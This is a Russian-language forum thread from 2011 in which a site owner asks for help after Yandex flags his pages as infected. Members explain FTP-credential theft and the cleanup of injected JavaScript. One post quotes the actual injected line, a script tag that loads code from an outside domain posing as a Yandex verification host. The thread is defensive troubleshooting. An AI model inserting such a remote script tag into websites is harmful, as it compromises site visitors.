Что мне делать? Я не разу не сталкивался с этим, даже не знаю что предпринять
Сайт не на движке.
В Гуглевебмастер всё норм, вирусов нет.
Помогите пожалуйста.
Вот пример заражённой страницы ***
Спустя 18 минут, 25 секунд (13.05.2011 - 18:40) inpost написал(а):
Если она заражена, зачем её открывать? Ты бы сам файл php скинул бы сюда.
Обычно в конец страницы вставляют js код. В самый конец, либо перед </body>, либо после этого тега.
Лечится просто, удаляется данная строка и меняются пароли доступа по FTP к сайту.
Учти, что взломали именно из твоего компьютера, твой комп передал данные на сервер хакеров, поэтому в первую очередь снять галочки "запомнить пароль" для доступа по ftp, и очистить свой комп от вирусов. (в дальнейшем если не работаешь с сайтом, тоже галочка должна быть снята)
Обычно в конец страницы вставляют js код. В самый конец, либо перед </body>, либо после этого тега.
Лечится просто, удаляется данная строка и меняются пароли доступа по FTP к сайту.
Учти, что взломали именно из твоего компьютера, твой комп передал данные на сервер хакеров, поэтому в первую очередь снять галочки "запомнить пароль" для доступа по ftp, и очистить свой комп от вирусов. (в дальнейшем если не работаешь с сайтом, тоже галочка должна быть снята)
Спустя 9 минут, 28 секунд (13.05.2011 - 18:50) bayanruby написал(а):
Даже не знаю что и скинуть 
У меня просто всё на инклудах.
У меня просто всё на инклудах.
Спустя 3 минуты, 55 секунд (13.05.2011 - 18:53) inpost написал(а):
Ищи глазками, пройди все скрипты, можешь смотреть на их размеры, дописанные будут больше по объему, чем твои бек-апы на компе.
Обычно заражаются файлы с именем index, или расширением .html
Обычно заражаются файлы с именем index, или расширением .html
Спустя 14 минут, 4 секунды (13.05.2011 - 19:08) bayanruby написал(а):
Может есть программа или сервис какойнебудь который покажет заражённый файл 
А можно просто удалить весь сайт, а потом резервный закачать(хорошо что я вчера бекапнул:))
А Яша показывает что сайт с вирусом мгновенно? Или допустим я убрал вирус, он сразу будет пускать на сайт?
А можно просто удалить весь сайт, а потом резервный закачать(хорошо что я вчера бекапнул:))
А Яша показывает что сайт с вирусом мгновенно? Или допустим я убрал вирус, он сразу будет пускать на сайт?
Спустя 6 минут, 39 секунд (13.05.2011 - 19:14) inpost написал(а):
Не проверял с ящей.
Можешь резервную закачать копию, только не факт, что у тебя на компе не зараженная версия лежит.
Когда я начинал, вирус заразил на компе все файлы index тоже, поэтому тебе помогут ручки и глазки. Лучше найти вирус и разобраться, как он устроен, чем просто бек-ап с надеждой, что это эфективно.
Можешь резервную закачать копию, только не факт, что у тебя на компе не зараженная версия лежит.
Когда я начинал, вирус заразил на компе все файлы index тоже, поэтому тебе помогут ручки и глазки. Лучше найти вирус и разобраться, как он устроен, чем просто бек-ап с надеждой, что это эфективно.
Спустя 5 минут, 46 секунд (13.05.2011 - 19:20) bayanruby написал(а):
интересно было бы ещё знать как этот вирус выглядит
примерно что мне искать в коде надо?
примерно что мне искать в коде надо?
Спустя 1 минута, 48 секунд (13.05.2011 - 19:22) bayanruby написал(а):
Я вот ещё на одном сайте нашёл скрипт такой ***
Как вы думаете он работает или фигня а не скрипт?
И если ему верить что может быть подозрительного в этом файле?
***
В этом файле для моих глаз всё одинаковое хД
Как вы думаете он работает или фигня а не скрипт?
И если ему верить что может быть подозрительного в этом файле?
***
В этом файле для моих глаз всё одинаковое хД
Спустя 15 минут, 46 секунд (13.05.2011 - 19:38) inpost написал(а):
bayanruby
Лучший ответ: обратись к своему программисту, за небольшую плату он починит всё.
Лучший ответ: обратись к своему программисту, за небольшую плату он починит всё.
Спустя 5 минут, 16 секунд (13.05.2011 - 19:43) bayanruby написал(а):
Я всея этого сайта хД
И денег у меня нет
Сверил по весу вчерашний бекап и толькчто бекап сайта, всё одинаково весит =\
Мда... чё желать?
В заинклюженых файлах ничего не нашёл.
Только в скриптах гостевая книга, опросы, ... не копался, там очень много и непонятно
И денег у меня нет
Сверил по весу вчерашний бекап и толькчто бекап сайта, всё одинаково весит =\
Мда... чё желать?
В заинклюженых файлах ничего не нашёл.
Только в скриптах гостевая книга, опросы, ... не копался, там очень много и непонятно
Спустя 3 минуты, 15 секунд (13.05.2011 - 19:46) Winston написал(а):
| Цитата (inpost @ 13.05.2011 - 17:40) |
| Обычно в конец страницы вставляют js код. В самый конец, либо перед </body>, либо после этого тега. Лечится просто, удаляется данная строка и меняются пароли доступа по FTP к сайту. |
Ага, так и лечится, у меня на днях влез на сайт вирус. Сайт на joomla, так в админке в каждый файл модуля, и компонента был вставлен js код который подключает скрипт с другого сайта.
Вот как он выглядел
<script type="text/javascript" src="http://ad.yandex-verification.net/verify-v1"></script>
Все решилось путем смены паролей на ftp, и откат сайта, благо был бэкап.
Спустя 1 час, 45 минут, 40 секунд (13.05.2011 - 21:32) sebastjan написал(а):
Эта проблемма мне известна, в моём случаи было так, через инетэксплорер получал каку
которая мне вставляля в индех файлы скрипт код.
Вернее когда по неосторожности пользовал ФТП для закачки на сервер, то и вставил мне эти каки в индекс файл.
inpost уже говорил что лечиться очень просто, смотришь свой хтмл файл и видишь там чужой яваскрипт, удаляешь и всё.
У меня это было только с индекс файлами, остальные чистые.
Вся проблемма это ИнетЭксплорер по нему впаривают, пользуюсь оперой, лисой и таких проблемм не имею.
которая мне вставляля в индех файлы скрипт код.
Вернее когда по неосторожности пользовал ФТП для закачки на сервер, то и вставил мне эти каки в индекс файл.
inpost уже говорил что лечиться очень просто, смотришь свой хтмл файл и видишь там чужой яваскрипт, удаляешь и всё.
У меня это было только с индекс файлами, остальные чистые.
Вся проблемма это ИнетЭксплорер по нему впаривают, пользуюсь оперой, лисой и таких проблемм не имею.
Спустя 14 минут, 37 секунд (13.05.2011 - 21:46) bayanruby написал(а):
Странно, уже 2 страницы заражено в Яше =\, недавно было 5
Может ктото увидит этот "вирус"?
***
Может ктото увидит этот "вирус"?
***
Спустя 2 часа, 59 минут, 58 секунд (14.05.2011 - 00:46) inpost написал(а):
bayanruby
так и будем заходить на вирусованные сайты.. может ты хакер и таким образом заманиваешь? По добру по хорошу снесу я ссылки, чтобы не творил ты злых вещей.
Как лечиться тебе рассказали. Если сайт сам делал, то должен понимать, что ты писал... а именно: написал ты echo 'Hello World';, - ты написал, значит твоих рук скрипт и ТЫ знаешь, что он делает. Вот так и надо смотреть, и если видишь инородный код - тогда удалять его!
так и будем заходить на вирусованные сайты.. может ты хакер и таким образом заманиваешь? По добру по хорошу снесу я ссылки, чтобы не творил ты злых вещей.
Как лечиться тебе рассказали. Если сайт сам делал, то должен понимать, что ты писал... а именно: написал ты echo 'Hello World';, - ты написал, значит твоих рук скрипт и ТЫ знаешь, что он делает. Вот так и надо смотреть, и если видишь инородный код - тогда удалять его!
Спустя 19 минут, 4 секунды (14.05.2011 - 01:05) sebastjan написал(а):
Кажись из под оперы или лисы этот вирусс не работает, только из ИЕ.
Хотя правильно, такие ссылки надо в топку.
Хотя правильно, такие ссылки надо в топку.
Спустя 16 часов, 51 минута, 33 секунды (14.05.2011 - 17:57) bayanruby написал(а):
Всё прошло хД
Яша курит вроде чтото не хорошее хД
Теперь в ЯВ нет ни вирусов, ничего, всё норм короче стало
Спасибо всем за помощь.
ЗЫ Я хакер 0_о, нее, пока нет
Яша курит вроде чтото не хорошее хД
Теперь в ЯВ нет ни вирусов, ничего, всё норм короче стало
Спасибо всем за помощь.
ЗЫ Я хакер 0_о, нее, пока нет